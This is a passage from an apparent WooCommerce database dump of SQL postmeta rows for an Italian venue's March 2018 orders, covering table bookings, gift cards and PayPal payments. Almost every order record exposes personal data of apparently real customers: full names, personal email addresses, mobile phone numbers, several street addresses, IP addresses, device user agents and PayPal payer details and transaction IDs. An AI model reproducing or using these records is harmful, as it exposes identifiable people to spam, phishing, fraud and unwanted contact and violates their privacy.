anni','0'),(11671,656,'Numero ragazzi fino a 13 anni','0'),(11672,656,'Files attached','[]'),(11673,656,'Payer PayPal address','Martinamazzucchelli@gmail.com'),(11674,656,'Payer first name','Martina'),(11675,656,'Payer last name','Mazzucchelli'),(11676,656,'Payment type','instant'),(11677,656,'_paypal_status','completed'),(11678,656,'_download_permissions_granted','yes'),(11679,656,'_recorded_sales','yes'),(11680,656,'_recorded_coupon_usage_counts','yes'),(11681,656,'_order_stock_reduced','yes'),(11682,656,'PayPal Transaction Fee','2.05'),(11683,657,'_order_key','wc_order_5ab55571c0287'),(11684,657,'_customer_user','0'),(11685,657,'_payment_method','paypal'),(11686,657,'_payment_method_title','PayPal'),(11687,657,'_transaction_id','2TG6356281841644X'),(11688,657,'_customer_ip_address','93.65.126.8'),(11689,657,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_13_3) applewebkit/604.5.6 (khtml, like gecko) version/11.0.3 safari/604.5.6'),(11690,657,'_created_via','checkout'),(11691,657,'_date_completed',''),(11692,657,'_completed_date',''),(11693,657,'_date_paid','1521833387'),(11694,657,'_paid_date','2018-03-23 20:29:47'),(11695,657,'_cart_hash','6f14b172f04b74dac29c5aa760d85d85'),(11696,657,'_billing_first_name','Marcello'),(11697,657,'_billing_last_name','Ferrari'),(11698,657,'_billing_company',''),(11699,657,'_billing_address_1',''),(11700,657,'_billing_address_2',''),(11701,657,'_billing_city',''),(11702,657,'_billing_state',''),(11703,657,'_billing_postcode',''),(11704,657,'_billing_country',''),(11705,657,'_billing_email','elenacasolari1525@gmail.com'),(11706,657,'_billing_phone','3349012488'),(11707,657,'_shipping_first_name',''),(11708,657,'_shipping_last_name',''),(11709,657,'_shipping_company',''),(11710,657,'_shipping_address_1',''),(11711,657,'_shipping_address_2',''),(11712,657,'_shipping_city',''),(11713,657,'_shipping_state',''),(11714,657,'_shipping_postcode',''),(11715,657,'_shipping_country',''),(11716,657,'_order_currency','EUR'),(11717,657,'_cart_discount','0'),(11718,657,'_cart_discount_tax','0'),(11719,657,'_order_shipping','0.00'),(11720,657,'_order_shipping_tax','0'),(11721,657,'_order_tax','0'),(11722,657,'_order_total','150.00'),(11723,657,'_order_version','3.3.4'),(11724,657,'_prices_include_tax','no'),(11725,657,'_billing_address_index','Marcello Ferrari        elenacasolari1525@gmail.com 3349012488'),(11726,657,'_shipping_address_index','        '),(11727,657,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(11728,657,'Numero bambini fino a 6 anni','1'),(11729,657,'Numero ragazzi fino a 13 anni','1'),(11730,657,'Files attached','[]'),(11731,657,'Payer PayPal address','marcelloferrari@art-posa.it'),(11732,657,'Payer first name','marcello'),(11733,657,'Payer last name','ferrari'),(11734,657,'Payment type','instant'),(11735,657,'_paypal_status','completed'),(11736,657,'_download_permissions_granted','yes'),(11737,657,'_recorded_sales','yes'),(11738,657,'_recorded_coupon_usage_counts','yes'),(11739,657,'_order_stock_reduced','yes'),(11740,657,'PayPal Transaction Fee','5.45'),(11741,658,'_order_key','wc_order_5ab57072ed42c'),(11742,658,'_customer_user','0'),(11743,658,'_payment_method','paypal'),(11744,658,'_payment_method_title','PayPal'),(11745,658,'_transaction_id','35E41979RS1150001'),(11746,658,'_customer_ip_address','79.7.146.67'),(11747,658,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; was-lx1a build/huaweiwas-lx1a) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.84 mobile safari/537.36'),(11748,658,'_created_via','checkout'),(11749,658,'_date_completed',''),(11750,658,'_completed_date',''),(11751,658,'_date_paid','1521840306'),(11752,658,'_paid_date','2018-03-23 22:25:06'),(11753,658,'_cart_hash','4b382bd1c0ff6f3a591c58262de178b1'),(11754,658,'_billing_first_name','Maria Antonietta'),(11755,658,'_billing_last_name','Berardi'),(11756,658,'_billing_company',''),(11757,658,'_billing_address_1','Via T. Mann 15'),(11758,658,'_billing_address_2',''),(11759,658,'_billing_city','Reggio Emilia'),(11760,658,'_billing_state',''),(11761,658,'_billing_postcode',''),(11762,658,'_billing_country',''),(11763,658,'_billing_email','Mariaantonietta.berardi@asmn.re.it'),(11764,658,'_billing_phone','3498247654'),(11765,658,'_shipping_first_name',''),(11766,658,'_shipping_last_name',''),(11767,658,'_shipping_company',''),(11768,658,'_shipping_address_1',''),(11769,658,'_shipping_address_2',''),(11770,658,'_shipping_city',''),(11771,658,'_shipping_state',''),(11772,658,'_shipping_postcode',''),(11773,658,'_shipping_country',''),(11774,658,'_order_currency','EUR'),(11775,658,'_cart_discount','0'),(11776,658,'_cart_discount_tax','0'),(11777,658,'_order_shipping','0.00'),(11778,658,'_order_shipping_tax','0'),(11779,658,'_order_tax','0'),(11780,658,'_order_total','100.00'),(11781,658,'_order_version','3.3.4'),(11782,658,'_prices_include_tax','no'),(11783,658,'_billing_address_index','Maria Antonietta Berardi  Via T. Mann 15  Reggio Emilia    Mariaantonietta.berardi@asmn.re.it 3498247654'),(11784,658,'_shipping_address_index','        '),(11785,658,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(11786,658,'Numero bambini fino a 6 anni','0'),(11787,658,'Numero ragazzi fino a 13 anni','0'),(11788,658,'Files attached','[]'),(11789,658,'Payer PayPal address','berardiannarita@gmail.com'),(11790,658,'Payer first name','Anna Rita'),(11791,658,'Payer last name','Berardi'),(11792,658,'Payment type','instant'),(11793,658,'_paypal_status','completed'),(11794,658,'_download_permissions_granted','yes'),(11795,658,'_recorded_sales','yes'),(11796,658,'_recorded_coupon_usage_counts','yes'),(11797,658,'_order_stock_reduced','yes'),(11798,658,'PayPal Transaction Fee','3.75'),(11799,659,'_order_key','wc_order_5ab60d36cd140'),(11800,659,'_customer_user','0'),(11801,659,'_payment_method','paypal'),(11802,659,'_payment_method_title','PayPal'),(11803,659,'_transaction_id','2EU42586LN949725Y'),(11804,659,'_customer_ip_address','79.27.65.245'),(11805,659,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_11_6) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(11806,659,'_created_via','checkout'),(11807,659,'_date_completed','1521880442'),(11808,659,'_completed_date','2018-03-24 09:34:02'),(11809,659,'_date_paid','1521880424'),(11810,659,'_paid_date','2018-03-24 09:33:44'),(11811,659,'_cart_hash','526184cf037928639cd05b7a8c7bc606'),(11812,659,'_billing_first_name','Agnese'),(11813,659,'_billing_last_name','Rossi'),(11814,659,'_billing_company',''),(11815,659,'_billing_address_1','Via Prov. Metaurense,78'),(11816,659,'_billing_address_2',''),(11817,659,'_billing_city','Fermignano'),(11818,659,'_billing_state',''),(11819,659,'_billing_postcode',''),(11820,659,'_billing_country',''),(11821,659,'_billing_email','nennir@hotmail.com'),(11822,659,'_billing_phone','3460214196'),(11823,659,'_shipping_first_name',''),(11824,659,'_shipping_last_name',''),(11825,659,'_shipping_company',''),(11826,659,'_shipping_address_1',''),(11827,659,'_shipping_address_2',''),(11828,659,'_shipping_city',''),(11829,659,'_shipping_state',''),(11830,659,'_shipping_postcode',''),(11831,659,'_shipping_country',''),(11832,659,'_order_currency','EUR'),(11833,659,'_cart_discount','0'),(11834,659,'_cart_discount_tax','0'),(11835,659,'_order_shipping','0.00'),(11836,659,'_order_shipping_tax','0'),(11837,659,'_order_tax','0'),(11838,659,'_order_total','120.00'),(11839,659,'_order_version','3.3.4'),(11840,659,'_prices_include_tax','no'),(11841,659,'_billing_address_index','Agnese Rossi  Via Prov. Metaurense,78  Fermignano    nennir@hotmail.com 3460214196'),(11842,659,'_shipping_address_index','        '),(11843,659,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(11844,659,'Numero bambini fino a 6 anni','0'),(11845,659,'Numero ragazzi fino a 13 anni','0'),(11846,659,'Files attached','[]'),(11847,659,'Payer PayPal address','nennir@hotmail.com'),(11848,659,'Payer first name','Agnese'),(11849,659,'Payer last name','Rossi'),(11850,659,'Payment type','instant'),(11851,659,'_paypal_status','completed'),(11852,659,'_download_permissions_granted','yes'),(11853,659,'_recorded_sales','yes'),(11854,659,'_recorded_coupon_usage_counts','yes'),(11855,660,'discount_type','fixed_cart'),(11856,660,'coupon_amount','120'),(11857,660,'individual_use','no'),(11858,660,'usage_limit','1'),(11859,660,'expiry_date','2018-09-20'),(11860,660,'apply_before_tax','no'),(11861,660,'free_shipping','no'),(11862,660,'minimum_amount',''),(11863,660,'maximum_amount',''),(11864,660,'exclude_sale_items','no'),(11865,660,'exclude_product_ids',''),(11866,660,'exclude_product_categories',''),(11867,660,'mwb_wgm_giftcard_coupon','659'),(11868,660,'mwb_wgm_giftcard_coupon_unique','online'),(11869,660,'mwb_wgm_giftcard_coupon_product_id','472'),(11870,660,'mwb_wgm_giftcard_coupon_mail_to','Lavinia'),(11871,659,'659#200','solymarcouponOVEA1'),(11872,659,'mwb_wgm_order_giftcard','send'),(11873,659,'_order_stock_reduced','yes'),(11874,659,'PayPal Transaction Fee','4.43'),(11875,661,'_order_key','wc_order_5ab634cbaafbb'),(11876,661,'_customer_user','0'),(11877,661,'_payment_method','paypal'),(11878,661,'_payment_method_title','PayPal'),(11879,661,'_transaction_id',''),(11880,661,'_customer_ip_address','176.206.11.39'),(11881,661,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(11882,661,'_created_via','checkout'),(11883,661,'_date_completed',''),(11884,661,'_completed_date',''),(11885,661,'_date_paid',''),(11886,661,'_paid_date',''),(11887,661,'_cart_hash','532f7045ef39c71e4d995902edd2f652'),(11888,661,'_billing_first_name','hhh'),(11889,661,'_billing_last_name','jjj'),(11890,661,'_billing_company',''),(11891,661,'_billing_address_1',''),(11892,661,'_billing_address_2',''),(11893,661,'_billing_city',''),(11894,661,'_billing_state',''),(11895,661,'_billing_postcode',''),(11896,661,'_billing_country',''),(11897,661,'_billing_email','rrr@tim.it'),(11898,661,'_billing_phone','3334567789'),(11899,661,'_shipping_first_name',''),(11900,661,'_shipping_last_name',''),(11901,661,'_shipping_company',''),(11902,661,'_shipping_address_1',''),(11903,661,'_shipping_address_2',''),(11904,661,'_shipping_city',''),(11905,661,'_shipping_state',''),(11906,661,'_shipping_postcode',''),(11907,661,'_shipping_country',''),(11908,661,'_order_currency','EUR'),(11909,661,'_cart_discount','0'),(11910,661,'_cart_discount_tax','0'),(11911,661,'_order_shipping','0.00'),(11912,661,'_order_shipping_tax','0'),(11913,661,'_order_tax','0'),(11914,661,'_order_total','50.00'),(11915,661,'_order_version','3.3.4'),(11916,661,'_prices_include_tax','no'),(11917,661,'_billing_address_index','hhh jjj        rrr@tim.it 3334567789'),(11918,661,'_shipping_address_index','        '),(11919,661,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(11920,661,'Numero bambini fino a 6 anni','3'),(11921,661,'Numero ragazzi fino a 13 anni','3'),(11922,661,'Files attached','[]'),(11923,662,'_order_key','wc_order_5ab6380d534c0'),(11924,662,'_customer_user','0'),(11925,662,'_payment_method','paypal'),(11926,662,'_payment_method_title','PayPal'),(11927,662,'_transaction_id',''),(11928,662,'_customer_ip_address','176.206.11.39'),(11929,662,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/65.0.3325.181 safari/537.36'),(11930,662,'_created_via','checkout'),(11931,662,'_date_completed',''),(11932,662,'_completed_date',''),(11933,662,'_date_paid',''),(11934,662,'_paid_date',''),(11935,662,'_cart_hash','83db6722f8b3952e4273b84768104293'),(11936,662,'_billing_first_name','dd'),(11937,662,'_billing_last_name','dd'),(11938,662,'_billing_company',''),(11939,662,'_billing_address_1',''),(11940,662,'_billing_address_2',''),(11941,662,'_billing_city',''),(11942,662,'_billing_state',''),(11943,662,'_billing_postcode',''),(11944,662,'_billing_country',''),(11945,662,'_billing_email','ddd@tim.it'),(11946,662,'_billing_phone','3334445556'),(11947,662,'_shipping_first_name',''),(11948,662,'_shipping_last_name',''),(11949,662,'_shipping_company',''),(11950,662,'_shipping_address_1',''),(11951,662,'_shipping_address_2',''),(11952,662,'_shipping_city',''),(11953,662,'_shipping_state',''),(11954,662,'_shipping_postcode',''),(11955,662,'_shipping_country',''),(11956,662,'_order_currency','EUR'),(11957,662,'_cart_discount','0'),(11958,662,'_cart_discount_tax','0'),(11959,662,'_order_shipping','0.00'),(11960,662,'_order_shipping_tax','0'),(11961,662,'_order_tax','0'),(11962,662,'_order_total','150.00'),(11963,662,'_order_version','3.3.4'),(11964,662,'_prices_include_tax','no'),(11965,662,'_billing_address_index','dd dd        ddd@tim.it 3334445556'),(11966,662,'_shipping_address_index','        '),(11967,662,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(11968,662,'Numero bambini fino a 6 anni','4'),(11969,662,'Numero ragazzi fino a 13 anni','4'),(11970,662,'Files attached','[]'),(11971,663,'_order_key','wc_order_5ab67499de64a'),(11972,663,'_customer_user','0'),(11973,663,'_payment_method','paypal'),(11974,663,'_payment_method_title','PayPal'),(11975,663,'_transaction_id','2M074303FA833023H'),(11976,663,'_customer_ip_address','146.241.150.170'),(11977,663,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(11978,663,'_created_via','checkout'),(11979,663,'_date_completed',''),(11980,663,'_completed_date',''),(11981,663,'_date_paid','1521907240'),(11982,663,'_paid_date','2018-03-24 17:00:40'),(11983,663,'_cart_hash','532f7045ef39c71e4d995902edd2f652'),(11984,663,'_billing_first_name','Cosetta'),(11985,663,'_billing_last_name','Poli'),(11986,663,'_billing_company',''),(11987,663,'_billing_address_1','Via Misurata 2'),(11988,663,'_billing_address_2',''),(11989,663,'_billing_city','Rimini'),(11990,663,'_billing_state',''),(11991,663,'_billing_postcode',''),(11992,663,'_billing_country',''),(11993,663,'_billing_email','cosettapoli@icloud.com'),(11994,663,'_billing_phone','3462201776'),(11995,663,'_shipping_first_name',''),(11996,663,'_shipping_last_name',''),(11997,663,'_shipping_company',''),(11998,663,'_shipping_address_1',''),(11999,663,'_shipping_address_2',''),(12000,663,'_shipping_city',''),(12001,663,'_shipping_state',''),(12002,663,'_shipping_postcode',''),(12003,663,'_shipping_country',''),(12004,663,'_order_currency','EUR'),(12005,663,'_cart_discount','0'),(12006,663,'_cart_discount_tax','0'),(12007,663,'_order_shipping','0.00'),(12008,663,'_order_shipping_tax','0'),(12009,663,'_order_tax','0'),(12010,663,'_order_total','50.00'),(12011,663,'_order_version','3.3.4'),(12012,663,'_prices_include_tax','no'),(12013,663,'_billing_address_index','Cosetta Poli  Via Misurata 2  Rimini    cosettapoli@icloud.com 3462201776'),(12014,663,'_shipping_address_index','        '),(12015,663,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12016,663,'Numero bambini fino a 6 anni','0'),(12017,663,'Numero ragazzi fino a 13 anni','0'),(12018,663,'Files attached','[]'),(12019,663,'Payer PayPal address','davide@arts-line.com'),(12020,663,'Payer first name','davide'),(12021,663,'Payer last name','ascione'),(12022,663,'Payment type','instant'),(12023,663,'_paypal_status','completed'),(12024,663,'_download_permissions_granted','yes'),(12025,663,'_recorded_sales','yes'),(12026,663,'_recorded_coupon_usage_counts','yes'),(12027,663,'_order_stock_reduced','yes'),(12028,663,'PayPal Transaction Fee','2.05'),(12029,664,'_order_key','wc_order_5ab6a4f2695ab'),(12030,664,'_customer_user','0'),(12031,664,'_payment_method','paypal'),(12032,664,'_payment_method_title','PayPal'),(12033,664,'_transaction_id','6ME52695LR455744B'),(12034,664,'_customer_ip_address','93.40.209.204'),(12035,664,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 10_3_3 like mac os x) applewebkit/603.3.8 (khtml, like gecko) version/10.0 mobile/14g60 safari/602.1'),(12036,664,'_created_via','checkout'),(12037,664,'_date_completed',''),(12038,664,'_completed_date',''),(12039,664,'_date_paid','1521919421'),(12040,664,'_paid_date','2018-03-24 20:23:41'),(12041,664,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12042,664,'_billing_first_name','Simone'),(12043,664,'_billing_last_name','Rossi'),(12044,664,'_billing_company',''),(12045,664,'_billing_address_1','Via pontescolle 40'),(12046,664,'_billing_address_2',''),(12047,664,'_billing_city','Cesena'),(12048,664,'_billing_state',''),(12049,664,'_billing_postcode',''),(12050,664,'_billing_country',''),(12051,664,'_billing_email','simonerossi84@gmail.com'),(12052,664,'_billing_phone','3407647907'),(12053,664,'_shipping_first_name',''),(12054,664,'_shipping_last_name',''),(12055,664,'_shipping_company',''),(12056,664,'_shipping_address_1',''),(12057,664,'_shipping_address_2',''),(12058,664,'_shipping_city',''),(12059,664,'_shipping_state',''),(12060,664,'_shipping_postcode',''),(12061,664,'_shipping_country',''),(12062,664,'_order_currency','EUR'),(12063,664,'_cart_discount','0'),(12064,664,'_cart_discount_tax','0'),(12065,664,'_order_shipping','0.00'),(12066,664,'_order_shipping_tax','0'),(12067,664,'_order_tax','0'),(12068,664,'_order_total','50.00'),(12069,664,'_order_version','3.3.4'),(12070,664,'_prices_include_tax','no'),(12071,664,'_billing_address_index','Simone Rossi  Via pontescolle 40  Cesena    simonerossi84@gmail.com 3407647907'),(12072,664,'_shipping_address_index','        '),(12073,664,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12074,664,'Numero bambini fino a 6 anni','0'),(12075,664,'Numero ragazzi fino a 13 anni','0'),(12076,664,'Files attached','[]'),(12077,664,'Payer PayPal address','simonerossi84@gmail.com'),(12078,664,'Payer first name','Alessia'),(12079,664,'Payer last name','Gallinucci'),(12080,664,'Payment type','instant'),(12081,664,'_paypal_status','completed'),(12082,664,'_download_permissions_granted','yes'),(12083,664,'_recorded_sales','yes'),(12084,664,'_recorded_coupon_usage_counts','yes'),(12085,664,'_order_stock_reduced','yes'),(12086,664,'PayPal Transaction Fee','2.05'),(12087,665,'_order_key','wc_order_5ab6a6fc024a6'),(12088,665,'_customer_user','0'),(12089,665,'_payment_method','paypal'),(12090,665,'_payment_method_title','PayPal'),(12091,665,'_transaction_id','30N4186897644833A'),(12092,665,'_customer_ip_address','91.252.164.95'),(12093,665,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; samsung sm-j710f build/nrd90m) applewebkit/537.36 (khtml, like gecko) samsungbrowser/6.4 chrome/56.0.2924.87 mobile safari/537.36'),(12094,665,'_created_via','checkout'),(12095,665,'_date_completed',''),(12096,665,'_completed_date',''),(12097,665,'_date_paid','1521919860'),(12098,665,'_paid_date','2018-03-24 20:31:00'),(12099,665,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12100,665,'_billing_first_name','Gasparin'),(12101,665,'_billing_last_name','Gasparin'),(12102,665,'_billing_company',''),(12103,665,'_billing_address_1','Via Daolio, 4'),(12104,665,'_billing_address_2',''),(12105,665,'_billing_city','Reggio Emilia'),(12106,665,'_billing_state',''),(12107,665,'_billing_postcode',''),(12108,665,'_billing_country',''),(12109,665,'_billing_email','sarahg82@hotmail.it'),(12110,665,'_billing_phone','3921018246'),(12111,665,'_shipping_first_name',''),(12112,665,'_shipping_last_name',''),(12113,665,'_shipping_company',''),(12114,665,'_shipping_address_1',''),(12115,665,'_shipping_address_2',''),(12116,665,'_shipping_city',''),(12117,665,'_shipping_state',''),(12118,665,'_shipping_postcode',''),(12119,665,'_shipping_country',''),(12120,665,'_order_currency','EUR'),(12121,665,'_cart_discount','0'),(12122,665,'_cart_discount_tax','0'),(12123,665,'_order_shipping','0.00'),(12124,665,'_order_shipping_tax','0'),(12125,665,'_order_tax','0'),(12126,665,'_order_total','50.00'),(12127,665,'_order_version','3.3.4'),(12128,665,'_prices_include_tax','no'),(12129,665,'_billing_address_index','Gasparin Gasparin  Via Daolio, 4  Reggio Emilia    sarahg82@hotmail.it 3921018246'),(12130,665,'_shipping_address_index','        '),(12131,665,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12132,665,'Numero bambini fino a 6 anni','0'),(12133,665,'Numero ragazzi fino a 13 anni','0'),(12134,665,'Files attached','[]'),(12135,665,'Payer PayPal address','sarahg82@hotmail.it'),(12136,665,'Payer first name','Jessica'),(12137,665,'Payer last name','Crotti'),(12138,665,'Payment type','instant'),(12139,665,'_paypal_status','completed'),(12140,665,'_download_permissions_granted','yes'),(12141,665,'_recorded_sales','yes'),(12142,665,'_recorded_coupon_usage_counts','yes'),(12143,665,'_order_stock_reduced','yes'),(12144,665,'PayPal Transaction Fee','2.05'),(12145,666,'_order_key','wc_order_5ab7a36dae263'),(12146,666,'_customer_user','0'),(12147,666,'_payment_method','paypal'),(12148,666,'_payment_method_title','PayPal'),(12149,666,'_transaction_id','469007712J269392G'),(12150,666,'_customer_ip_address','185.96.21.173'),(12151,666,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.1.34 (khtml, like gecko) crios/65.0.3325.152 mobile/15d100 safari/604.1'),(12152,666,'_created_via','checkout'),(12153,666,'_date_completed',''),(12154,666,'_completed_date',''),(12155,666,'_date_paid','1521984471'),(12156,666,'_paid_date','2018-03-25 15:27:51'),(12157,666,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12158,666,'_billing_first_name','Daniele'),(12159,666,'_billing_last_name','Salvietti'),(12160,666,'_billing_company',''),(12161,666,'_billing_address_1','Via Manciano 56/C'),(12162,666,'_billing_address_2',''),(12163,666,'_billing_city','Castiglion Fiorentino'),(12164,666,'_billing_state',''),(12165,666,'_billing_postcode',''),(12166,666,'_billing_country',''),(12167,666,'_billing_email','salviettid@gmail.com'),(12168,666,'_billing_phone','3357384339'),(12169,666,'_shipping_first_name',''),(12170,666,'_shipping_last_name',''),(12171,666,'_shipping_company',''),(12172,666,'_shipping_address_1',''),(12173,666,'_shipping_address_2',''),(12174,666,'_shipping_city',''),(12175,666,'_shipping_state',''),(12176,666,'_shipping_postcode',''),(12177,666,'_shipping_country',''),(12178,666,'_order_currency','EUR'),(12179,666,'_cart_discount','0'),(12180,666,'_cart_discount_tax','0'),(12181,666,'_order_shipping','0.00'),(12182,666,'_order_shipping_tax','0'),(12183,666,'_order_tax','0'),(12184,666,'_order_total','50.00'),(12185,666,'_order_version','3.3.4'),(12186,666,'_prices_include_tax','no'),(12187,666,'_billing_address_index','Daniele Salvietti  Via Manciano 56/C  Castiglion Fiorentino    salviettid@gmail.com 3357384339'),(12188,666,'_shipping_address_index','        '),(12189,666,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12190,666,'Numero bambini fino a 6 anni','0'),(12191,666,'Numero ragazzi fino a 13 anni','0'),(12192,666,'Files attached','[]'),(12193,666,'Payer PayPal address','salviettid@gmail.com'),(12194,666,'Payer first name','Daniele'),(12195,666,'Payer last name','Salvietti'),(12196,666,'Payment type','instant'),(12197,666,'_paypal_status','completed'),(12198,666,'_download_permissions_granted','yes'),(12199,666,'_recorded_sales','yes'),(12200,666,'_recorded_coupon_usage_counts','yes'),(12201,666,'_order_stock_reduced','yes'),(12202,666,'PayPal Transaction Fee','2.05'),(12203,667,'_order_key','wc_order_5ab90bcb97a92'),(12204,667,'_customer_user','27'),(12205,667,'_payment_method','paypal'),(12206,667,'_payment_method_title','PayPal'),(12207,667,'_transaction_id','37T64950KV5494749'),(12208,667,'_customer_ip_address','188.9.204.74'),(12209,667,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64; rv:59.0) gecko/20100101 firefox/59.0'),(12210,667,'_created_via','checkout'),(12211,667,'_date_completed',''),(12212,667,'_completed_date',''),(12213,667,'_date_paid','1522077181'),(12214,667,'_paid_date','2018-03-26 17:13:01'),(12215,667,'_cart_hash','606ba2fcc97053f8218eb22d3c9ed784'),(12216,667,'_billing_first_name','matteo'),(12217,667,'_billing_last_name','venturi'),(12218,667,'_billing_company',''),(12219,667,'_billing_address_1','viale armando diaz 7'),(12220,667,'_billing_address_2',''),(12221,667,'_billing_city','sansepolcro'),(12222,667,'_billing_state',''),(12223,667,'_billing_postcode',''),(12224,667,'_billing_country',''),(12225,667,'_billing_email','mventuri@me.com'),(12226,667,'_billing_phone','3356172357'),(12227,667,'_shipping_first_name',''),(12228,667,'_shipping_last_name',''),(12229,667,'_shipping_company',''),(12230,667,'_shipping_address_1',''),(12231,667,'_shipping_address_2',''),(12232,667,'_shipping_city',''),(12233,667,'_shipping_state',''),(12234,667,'_shipping_postcode',''),(12235,667,'_shipping_country',''),(12236,667,'_order_currency','EUR'),(12237,667,'_cart_discount','0'),(12238,667,'_cart_discount_tax','0'),(12239,667,'_order_shipping','0.00'),(12240,667,'_order_shipping_tax','0'),(12241,667,'_order_tax','0'),(12242,667,'_order_total','50.00'),(12243,667,'_order_version','3.3.4'),(12244,667,'_prices_include_tax','no'),(12245,667,'_billing_address_index','matteo venturi  viale armando diaz 7  sansepolcro    mventuri@me.com 3356172357'),(12246,667,'_shipping_address_index','        '),(12247,667,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(12248,667,'Numero bambini fino a 6 anni','0'),(12249,667,'Numero ragazzi fino a 13 anni','0'),(12250,667,'Files attached','[]'),(12251,667,'Payer PayPal address','mventuri@me.com'),(12252,667,'Payer first name','Matteo'),(12253,667,'Payer last name','Venturi'),(12254,667,'Payment type','instant'),(12255,667,'_paypal_status','completed'),(12256,667,'_download_permissions_granted','yes'),(12257,667,'_recorded_sales','yes'),(12258,667,'_recorded_coupon_usage_counts','yes'),(12259,667,'_order_stock_reduced','yes'),(12260,667,'PayPal Transaction Fee','2.05'),(12261,668,'_order_key','wc_order_5ab93da2596c2'),(12262,668,'_customer_user','0'),(12263,668,'_payment_method','paypal'),(12264,668,'_payment_method_title','PayPal'),(12265,668,'_transaction_id',''),(12266,668,'_customer_ip_address','195.43.182.99'),(12267,668,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_6 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d100 safari/604.1'),(12268,668,'_created_via','checkout'),(12269,668,'_date_completed',''),(12270,668,'_completed_date',''),(12271,668,'_date_paid',''),(12272,668,'_paid_date',''),(12273,668,'_cart_hash','210c239b588192beeee6fb77913af57f'),(12274,668,'_billing_first_name','Marisa'),(12275,668,'_billing_last_name','Grossi'),(12276,668,'_billing_company',''),(12277,668,'_billing_address_1',''),(12278,668,'_billing_address_2',''),(12279,668,'_billing_city',''),(12280,668,'_billing_state',''),(12281,668,'_billing_postcode',''),(12282,668,'_billing_country',''),(12283,668,'_billing_email','Grossimarisa@gmail.com'),(12284,668,'_billing_phone','3333141100'),(12285,668,'_shipping_first_name',''),(12286,668,'_shipping_last_name',''),(12287,668,'_shipping_company',''),(12288,668,'_shipping_address_1',''),(12289,668,'_shipping_address_2',''),(12290,668,'_shipping_city',''),(12291,668,'_shipping_state',''),(12292,668,'_shipping_postcode',''),(12293,668,'_shipping_country',''),(12294,668,'_order_currency','EUR'),(12295,668,'_cart_discount','0'),(12296,668,'_cart_discount_tax','0'),(12297,668,'_order_shipping','0.00'),(12298,668,'_order_shipping_tax','0'),(12299,668,'_order_tax','0'),(12300,668,'_order_total','175.00'),(12301,668,'_order_version','3.3.4'),(12302,668,'_prices_include_tax','no'),(12303,668,'_billing_address_index','Marisa Grossi        Grossimarisa@gmail.com 3333141100'),(12304,668,'_shipping_address_index','        '),(12305,668,'Indicare in caso di prenotazione tavolo. Quanti adulti?','7'),(12306,668,'Numero bambini fino a 6 anni','0'),(12307,668,'Numero ragazzi fino a 13 anni','0'),(12308,668,'Files attached','[]'),(12309,669,'_order_key','wc_order_5ab9426f22937'),(12310,669,'_customer_user','0'),(12311,669,'_payment_method','paypal'),(12312,669,'_payment_method_title','PayPal'),(12313,669,'_transaction_id','5GF820191R3320902'),(12314,669,'_customer_ip_address','79.34.237.187'),(12315,669,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64; rv:59.0) gecko/20100101 firefox/59.0'),(12316,669,'_created_via','checkout'),(12317,669,'_date_completed',''),(12318,669,'_completed_date',''),(12319,669,'_date_paid','1522090676'),(12320,669,'_paid_date','2018-03-26 20:57:56'),(12321,669,'_cart_hash','d3336598acce32391ee89c7ea89dac94'),(12322,669,'_billing_first_name','ranieri'),(12323,669,'_billing_last_name','niccoli'),(12324,669,'_billing_company',''),(12325,669,'_billing_address_1',''),(12326,669,'_billing_address_2',''),(12327,669,'_billing_city',''),(12328,669,'_billing_state',''),(12329,669,'_billing_postcode',''),(12330,669,'_billing_country',''),(12331,669,'_billing_email','ranieri.niccoli@alice.it'),(12332,669,'_billing_phone','3494598277'),(12333,669,'_shipping_first_name',''),(12334,669,'_shipping_last_name',''),(12335,669,'_shipping_company',''),(12336,669,'_shipping_address_1',''),(12337,669,'_shipping_address_2',''),(12338,669,'_shipping_city',''),(12339,669,'_shipping_state',''),(12340,669,'_shipping_postcode',''),(12341,669,'_shipping_country',''),(12342,669,'_order_currency','EUR'),(12343,669,'_cart_discount','0'),(12344,669,'_cart_discount_tax','0'),(12345,669,'_order_shipping','0.00'),(12346,669,'_order_shipping_tax','0'),(12347,669,'_order_tax','0'),(12348,669,'_order_total','125.00'),(12349,669,'_order_version','3.3.4'),(12350,669,'_prices_include_tax','no'),(12351,669,'_billing_address_index','ranieri niccoli        ranieri.niccoli@alice.it 3494598277'),(12352,669,'_shipping_address_index','        '),(12353,669,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(12354,669,'Numero bambini fino a 6 anni','1'),(12355,669,'Numero ragazzi fino a 13 anni','0'),(12356,669,'Files attached','[]'),(12357,669,'Payer PayPal address','ranieri.niccoli@alice.it'),(12358,669,'Payer first 